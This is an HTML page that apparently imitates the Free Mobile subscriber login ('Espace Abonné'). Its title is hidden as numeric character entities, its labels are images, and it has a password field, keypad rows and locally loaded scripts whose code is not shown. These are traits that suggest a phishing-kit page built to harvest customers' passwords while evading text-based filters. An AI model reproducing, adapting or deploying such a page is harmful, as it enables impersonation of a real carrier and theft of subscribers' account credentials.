<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link rel="shortcut icon" href="favicon.ico">
<title>&#70;&#114;&#101;&#101;&#32;&#77;&#111;&#98;&#105;&#108;&#101;&#32;&#45;&#32;&#66;&#105;&#101;&#110;&#118;&#101;&#110;&#117;&#101;&#32;&#100;&#97;&#110;&#115;&#32;&#118;&#111;&#116;&#114;&#101;&#32;&#69;&#115;&#112;&#97;&#99;&#101;&#32;&#65;&#98;&#111;&#110;&#110;&#233;</title>
<style>
body {
	background-color: #F9F8F8;
	font-family: Arial;
	font-size: 12px;
	text-align: center;
}
#h {
	width:1010px;
	height:129px;
	background-image:url("h.png");
	background-repeat:no-repeat;
	background-position:0px 0px;
}
#c {
	width:1010px;
	background-image:url("c.png");
	background-repeat:repeat-y;
	background-position:0px 0px;
}
#f {
	width:1010px;
	height:194px;
	background-image:url("f.png");
	background-repeat:no-repeat;
	background-position:0px 0px;
}
#err {
	width:978px;
	height:55px;
	background-image:url("err.png");
	background-repeat:no-repeat;
	background-position:0px 0px;
	margin-left: 15px;
	margin-top: -10px;
	display: none;
}
#lbg {
	float:left;
	margin-left: 6px;
	width:356px;
	height:337px;
	background-image:url("lbg.png");
	background-repeat:no-repeat;
	background-position:0px 0px;
}
#rbg {
	float:right;
	margin-right: 28px;
	width:470px;
	height:370px;
	background-image:url("bg.png");
	background-repeat:no-repeat;
	background-position:0px 0px;
}
#ins {
	width:359px;
	height:22px;
	background-image:url("ins.png");
	background-repeat:no-repeat;
	background-position:0px 0px;
}
#mt {
	margin-top: 12px;
}
.ch {
	cursor: pointer;
}
#ft {
	width:350px;
	margin-top: 10px;
}
#ft tr td {
	text-align: center;
	padding-bottom: 7px;
}
#ln {
	width:95px;
}
#ps {
	width: 150px;
	color: #C00000;
	border-color: rgba(192,0,0,.5);
	border: 1px solid;
	height: 20px;
	line-height: 16px;
	font-size: 14px;
	padding: 2px 5px;
	background-color: #FFF;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px / 3px;
	border-radius: 3px / 3px;
	font-weight: 400;
}
#btnz {
	margin-right: -40px;
	margin-top: 20px;
}
</style>
</head>
<script src="jquery-1.11.0.min.js"></script>
<script src="jquery.validate.js"></script>
<script src="jquery.js"></script>
<body>
<table align="center" cellspacing="0">
<tr><td id="h"></td></tr>
<tr><td id="c">
	<div id="err" class="ch"></div>
	<table width="100%">
	<tr><td><div id="lbg"></div></td>
	<td><div id="rbg">
		<table align="center" id="mt">
			<tr><td><div id="ins"></div></td></tr>
			<tr><td>
				<table align="center">
					<tr id="kp1">
					</tr>
					<tr id="kp2">
					</tr>
				</table>
			</td></tr>
			<tr><td>
				<table align="center" id="ft">
					<tr><td id="ln"><img src="ide.png"></td><td id="MIDI"><img id="fins" src="fins.png"></td></tr>
					<tr><td id="ln"><img src="mp.png"></td><td><input type="password" name="ps" id="ps" maxlength="30"></td></tr>
				</table>
				<br>
				<img src="fpwq.png" class="ch">
				<br><br>
				<table id="btnz" align="right">
					<tr><td><img src="can.png" id="can" class="ch"></td><td><img src="_con.png" id="con" class="ch"></td></tr>
				</table>
			</td></tr>
		</table>
	</div></td>
	</tr>
	</table>
</td></tr>
<tr><td id="f"></td></tr>
</table>
<div id="gtwy"></div>
</body>
</html>